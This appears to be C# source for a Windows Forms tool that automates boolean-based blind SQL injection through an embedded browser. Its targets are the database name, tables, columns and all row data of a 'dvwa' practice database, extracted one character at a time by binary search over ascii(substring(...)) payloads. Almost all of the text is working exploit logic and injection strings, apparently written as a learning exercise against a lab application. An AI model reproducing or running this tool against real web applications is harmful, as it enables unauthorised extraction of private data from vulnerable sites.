private void button1_Click(object sender, EventArgs e) { btn_Click = true; Confirm.Is_Click_btnGDatabaseName = true; Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT DATABASE()), 0,1))) >= 127 #"; Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name); PutData(Variable.Sql_Request); btn_GetDBName.Enabled = false; }
public static ResultRequest.Job Get_Result_Respond(ResultRequest.Result result, ref string sql, ref int left, ref int right, ref int mid, ref string str_result) { ResultRequest.Job work_state = ResultRequest.Job.None; if (Confirm.Is_Click_btnGDatabaseName) { work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DB_Name, ref sql, ref left, ref right, ref mid, ref str_result); } else if (Confirm.Is_Click_btnGNameTables) { if (Confirm.Count_Tables_Done) { work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.TABLES_NAME, ref sql, ref left, ref right, ref mid, ref str_result); } else { work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.TABLES_NAME, ref sql, ref left, ref right, ref mid, ref str_result); } } else if (Confirm.Is_Click_btnGNameColumns) { if (Confirm.Find_Quantity_Done) { work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.COLUMNS_NAME, ref sql, ref left, ref right, ref mid, ref str_result); } else { work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.COLUMNS_NAME, ref sql, ref left, ref right, ref mid, ref str_result); } } else if (Confirm.Is_Click_btnGetData) { if (!Confirm.Find_Quantity_Row_Done.Contains(false)) { work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DATA_TABLE, ref sql, ref left, ref right, ref mid, ref str_result); } else { work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.DATA_TABLE, ref sql, ref left, ref right, ref mid, ref str_result); } } return(work_state); }
private void btn_GetData_Click(object sender, EventArgs e) { if (Variable.Db_TablesName.Count != 0) //find tables name done { if (Variable.Db_ColumnsName[0].Count != 0) //find columns name done { btn_Click = true; Confirm.Is_Click_btnGetData = true; if (Confirm.Find_Quantity_Row_Done.Count != 0 && !Confirm.Find_Quantity_Row_Done.Contains(false)) { if (Variable.Bd_DataTable.Count == 0) { Init_DataTable(); Variable.Index_Columns = Variable.Index_Rows = Variable.Index_Tables = 0; } while (true) { if (Variable.Index_Tables >= Variable.Quantity_Tables) { List <List <List <string> > > a = Variable.Bd_DataTable; Variable.Index_Tables = Variable.Index_Columns = Variable.Index_Rows = 0; Variable.Reset_Data_Variable(); return; } else { if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables]) { Variable.Index_Columns = 0; Variable.Index_Rows++; if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables]) { Variable.Index_Rows = 0; Variable.Index_Tables++; } } else if (!clb_ColsName.GetItemChecked(clb_ColsName.Items.IndexOf(Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns]))) { Variable.Index_Columns++; } else { break; } } } Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT " + Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] + " from dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + " LIMIT 0, 1), 0, 1))) >= 127 #"; if (Variable.Index_Tables < Variable.Quantity_Tables) { if (Variable.Index_Rows < Variable.Quantity_Row[Variable.Index_Tables]) { if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables]) { Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE); PutData(Variable.Sql_Request); } } else { List <List <List <string> > > a = Variable.Bd_DataTable; } } } else //count quantity don't complete { if (Confirm.Find_Quantity_Row_Done.Count == 0) { for (int run = 0; run < Variable.Quantity_Tables; run++) { Confirm.Find_Quantity_Row_Done.Add(false); Variable.Quantity_Row.Add(0); } Variable.Index_Tables = 0; Variable.Str_result = ""; Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #"; PutData(Variable.Sql_Request); } else { for (int run = 0; run < Confirm.Find_Quantity_Row_Done.Count; run++) { if (Confirm.Find_Quantity_Row_Done[run] == false) { Variable.Index_Tables = run; break; } } //count row Variable.Str_result = ""; Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #"; PutData(Variable.Sql_Request); } } } } }
private void btn_GetColsName_Click(object sender, EventArgs e) { if (Variable.Quantity_Tables != 0) { btn_Click = true; Confirm.Is_Click_btnGNameColumns = true; if (Confirm.Find_Quantity_Done) //had quantity { if (Variable.Db_ColumnsName.Count == 0) { for (int row = 0; row < Variable.Quantity_Tables; row++) { List <string> temp = new List <string>(); for (int col = 0; col < Variable.Quantity_Columns[row]; col++) { temp.Add(""); } Variable.Db_ColumnsName.Add(temp); } Variable.Index_Columns = Variable.Index_Tables = 0; Variable.Index_str = 0; } //ascii(lower(substring((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA LIKE 'dvwa' LIMIT 0, 1), 0, 1))) >= 127 #"; if (Variable.Index_Tables < Variable.Quantity_Tables) { Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "' LIMIT 0, 1), 0, 1))) >= 127 #"; if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables]) { Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME); PutData(Variable.Sql_Request); } } else { cmb_Tables.Items.Add("ALL"); foreach (string str in Variable.Db_TablesName) { cmb_TbsName.Items.Add(str); cmb_Tables.Items.Add(str); } cmb_TbsName.SelectedIndex = 0; cmb_Tables.SelectedIndex = 0; foreach (List <string> ls in Variable.Db_ColumnsName) { foreach (string str in ls) { clb_ColsName.Items.Add(str, true); } } btn_GetTBsName.Enabled = false; btn_Click = false; Variable.Index_Columns = Variable.Index_Tables = 0; Confirm.Is_Click_btnGNameColumns = false; Variable.Reset_Data_Variable(); return; } } else // count quantity { if (Variable.Quantity_Columns.Count == 0) { Variable.Index_Tables = 0; for (int run = 0; run < Variable.Quantity_Tables; run++) { Variable.Quantity_Columns.Add(0); } } if (Variable.Index_Tables < Variable.Quantity_Tables) { //sql = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE 'guestbook') >= 127 #"; Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "') >= 127 #"; PutData(Variable.Sql_Request); } else //find done { Confirm.Find_Quantity_Done = true; Variable.Index_Tables = 0; Variable.Index_Columns = 0; btn_GetColsName.PerformClick(); return; } } } }
private void wbro_Brower_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e) { txt_Url.Text = wbro_Brower.Url.ToString(); html = wbro_Brower.DocumentText; html_Document_Current = wbro_Brower.Document; if (btn_Click) { ResultRequest.Result result = Handing.GetResultSubmit(html_Document_Current); ResultRequest.Job work_state = ResultRequest.Job.None; int left, mid, right, index; string str_result, sql; left = mid = right = index = 0; str_result = sql = ""; Variable.Get_Data_Variable(ref left, ref mid, ref right, ref index, ref str_result, ref sql); work_state = Handing.Get_Result_Respond(result, ref sql, ref left, ref right, ref mid, ref str_result); Variable.Set_Data_Variable(left, mid, right, index, str_result, sql); if (work_state == ResultRequest.Job.Done_ALL) { if (Confirm.Is_Click_btnGDatabaseName) { Confirm.Is_Click_btnGDatabaseName = false; btn_Click = false; btn_GetDBName.Enabled = false; Variable.Left = 0; Variable.Right = 255; Variable.Mid = 127; Variable.Index_str = 0; Variable.Str_result = ""; return; } else if (Confirm.Is_Click_btnGNameTables) { if (Confirm.Count_Tables_Done) // print table name { Variable.Index_str = 0; if (Variable.Index_Tables < Variable.Quantity_Tables) { Variable.Index_Tables++; lbl_TBsName.Text += " "; Variable.Left = 0; Variable.Right = 255; Variable.Mid = 127; btn_GetTBsName.PerformClick(); return; } else // all done { Variable.Index_str = 0; Confirm.Is_Click_btnGNameTables = false; btn_Click = false; cmb_TbsName.Items.Add(Variable.Db_TablesName); return; } } else { lbl_Count_TBsName.Text += Variable.Str_result; Variable.Quantity_Tables = Convert.ToInt32(Variable.Str_result); Confirm.Count_Tables_Done = true; Variable.Reset_Data_Variable(); btn_GetTBsName.PerformClick(); return; } } else if (Confirm.Is_Click_btnGNameColumns) { if (Confirm.Find_Quantity_Done) { Variable.Index_Columns++; if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables]) { Variable.Index_Columns = 0; Variable.Index_Tables++; } Variable.Reset_Data_Variable(); btn_GetColsName.PerformClick(); return; } else { Variable.Quantity_Columns[Variable.Index_Tables] = Convert.ToInt32(Variable.Str_result); Variable.Str_result = ""; Variable.Index_Tables++; Variable.Reset_Data_Variable(); btn_GetColsName.PerformClick(); return; } } else if (Confirm.Is_Click_btnGetData) { if (Confirm.Find_Quantity_Row_Done.Contains(false)) //don't complete { Variable.Quantity_Row[Variable.Index_Tables] = Convert.ToInt32(Variable.Str_result); Confirm.Find_Quantity_Row_Done[Variable.Index_Tables] = true; Variable.Reset_Data_Variable(); btn_GetData.PerformClick(); return; } else { Variable.Index_Columns++; if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables]) { Variable.Index_Columns = 0; Variable.Index_Rows++; if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables]) { Variable.Index_Rows = 0; Variable.Index_Tables++; } } else { Change_IndexCols_Whent_GetDataTable(); } Variable.Reset_Data_Variable(); btn_GetData.PerformClick(); return; } } } else if (work_state == ResultRequest.Job.Done_OnePart) { if (Confirm.Is_Click_btnGDatabaseName) { lbl_Result_DBName.Text += Variable.Str_result; Variable.Db_Name += Variable.Str_result; Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name); } else if (Confirm.Is_Click_btnGNameTables) { Variable.Db_TablesName[Variable.Index_Tables] += Variable.Str_result; lbl_TBsName.Text += Variable.Str_result; Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.TABLES_NAME); } else if (Confirm.Is_Click_btnGNameColumns) { Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] += Variable.Str_result; Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME); } else if (Confirm.Is_Click_btnGetData) { Variable.Bd_DataTable[Variable.Index_Tables][Variable.Index_Rows][Variable.Index_Columns] += Variable.Str_result; Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE); dgv_Data.DataSource = Fill_Data_To_DataTable(); } PutData(Variable.Sql_Request); } else if (work_state == ResultRequest.Job.Continue) { PutData(Variable.Sql_Request); } } }